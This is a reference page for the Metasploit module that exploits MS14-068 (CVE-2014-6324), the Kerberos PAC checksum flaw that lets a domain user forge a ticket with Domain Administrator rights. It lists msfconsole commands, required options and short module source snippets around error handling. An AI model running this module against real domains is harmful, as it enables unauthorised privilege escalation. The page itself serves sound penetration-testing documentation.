MS14-068 Microsoft Kerberos Checksum Validation Vulnerability - Metasploit


This page contains detailed information about how to use the auxiliary/admin/kerberos/ms14_068_kerberos_checksum metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
Source code: modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb
Disclosure date: 2014-11-18
Last modification time: 2022-04-08 11:35:31 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 88
List of CVEs: CVE-2014-6324

This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS request, where a domain user may forge a PAC with arbitrary privileges, including Domain Administrator. This module requests a TGT ticket with a forged PAC and exports it to a MIT Kerberos Credential Cache file. It can be loaded on Windows systems with the Mimikatz help. It has been tested successfully on Windows 2008.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf auxiliary(ms14_068_kerberos_checksum) > show targets
    ... a list of targets ...
msf auxiliary(ms14_068_kerberos_checksum) > set TARGET target-id
msf auxiliary(ms14_068_kerberos_checksum) > show options
    ... show and set options ...
msf auxiliary(ms14_068_kerberos_checksum) > exploit

Required Options

  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • USER: The Domain User

  • PASSWORD: The Domain User password

  • DOMAIN: The Domain (upper case) Ex: DEMO.LOCAL

  • USER_SID: The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

Go back to menu.

Msfconsole Usage

Here is how the admin/kerberos/ms14_068_kerberos_checksum auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show info

       Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
     Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-11-18

Provided by:
  Tom Maddock
  Sylvain Monne
  juan vazquez <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  DOMAIN                     yes       The Domain (upper case) Ex: DEMO.LOCAL
  PASSWORD                   yes       The Domain User password
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     88               yes       The target port
  Timeout   10               yes       The TCP timeout to establish connection and read data
  USER                       yes       The Domain User
  USER_SID                   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

Description:
  This module exploits a vulnerability in the Microsoft Kerberos 
  implementation. The problem exists in the verification of the 
  Privilege Attribute Certificate (PAC) from a Kerberos TGS request, 
  where a domain user may forge a PAC with arbitrary privileges, 
  including Domain Administrator. This module requests a TGT ticket 
  with a forged PAC and exports it to a MIT Kerberos Credential Cache 
  file. It can be loaded on Windows systems with the Mimikatz help. It 
  has been tested successfully on Windows 2008.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2014-6324
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/MS14-068
  OSVDB (114751)
  http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
  https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
  https://github.com/bidord/pykek
  https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit

Module Options

This is a complete list of options available in the admin/kerberos/ms14_068_kerberos_checksum auxiliary module:

msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show options

Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     yes       The Domain (upper case) Ex: DEMO.LOCAL
   PASSWORD                   yes       The Domain User password
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     88               yes       The target port
   Timeout   10               yes       The TCP timeout to establish connection and read data
   USER                       yes       The Domain User
   USER_SID                   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

Advanced Options

Here is a complete list of advanced options supported by the admin/kerberos/ms14_068_kerberos_checksum auxiliary module:

msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show advanced

Module advanced options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the admin/kerberos/ms14_068_kerberos_checksum module can do:

msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the admin/kerberos/ms14_068_kerberos_checksum auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Invalid USER_SID. Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

Here is a relevant code snippet related to the "Invalid USER_SID. Ex: S-1-5-21-1755879683-3641577184-3486455962-1000" error message:

49:	
50:	  def run
51:	    print_status("Validating options...")
52:	
53:	    unless datastore['USER_SID'] =~ /^S-(\d+-){6}\d+$/
54:	      print_error("Invalid USER_SID. Ex: S-1-5-21-1755879683-3641577184-3486455962-1000")
55:	      return
56:	    end
57:	
58:	    domain = datastore['DOMAIN'].upcase
59:

<PEER> - Invalid AS-REP, aborting...

Here is a relevant code snippet related to the "<PEER> - Invalid AS-REP, aborting..." error message:

80:	      pa_data: pre_auth
81:	    )
82:	
83:	    unless res.msg_type == Rex::Proto::Kerberos::Model::AS_REP
84:	      print_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
85:	      print_error("#{peer} - Invalid AS-REP, aborting...")
86:	      return
87:	    end
88:	
89:	    print_status("#{peer} - Parsing AS-REP...")
90:

<PEER> - Invalid TGS-REP, aborting...

Here is a relevant code snippet related to the "<PEER> - Invalid TGS-REP, aborting..." error message:

129:	      subkey: sub_key
130:	    )
131:	
132:	    unless res.msg_type == Rex::Proto::Kerberos::Model::TGS_REP
133:	      print_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
134:	      print_error("#{peer} - Invalid TGS-REP, aborting...")
135:	      return
136:	    end
137:	
138:	    print_good("#{peer} - Valid TGS-Response, extracting credentials...")
139:

<ERROR_INFO:0> - <ERROR_INFO:1>

Here is a relevant code snippet related to the "<ERROR_INFO:0> - <ERROR_INFO:1>" error message:

146:	  def warn_error(res)
147:	    msg = ''
148:	
149:	    if Rex::Proto::Kerberos::Model::ERROR_CODES.has_key?(res.error_code)
150:	      error_info = Rex::Proto::Kerberos::Model::ERROR_CODES[res.error_code]
151:	      msg = "#{error_info[0]} - #{error_info[1]}"
152:	    else
153:	      msg = 'Unknown error'
154:	    end
155:	
156:	    msg

Unknown error

Here is a relevant code snippet related to the "Unknown error" error message:

148:	
149:	    if Rex::Proto::Kerberos::Model::ERROR_CODES.has_key?(res.error_code)
150:	      error_info = Rex::Proto::Kerberos::Model::ERROR_CODES[res.error_code]
151:	      msg = "#{error_info[0]} - #{error_info[1]}"
152:	    else
153:	      msg = 'Unknown error'
154:	    end
155:	
156:	    msg
157:	  end
158:	end

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • Tom Maddock
  • Sylvain Monne
  • juan vazquez

Version

This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.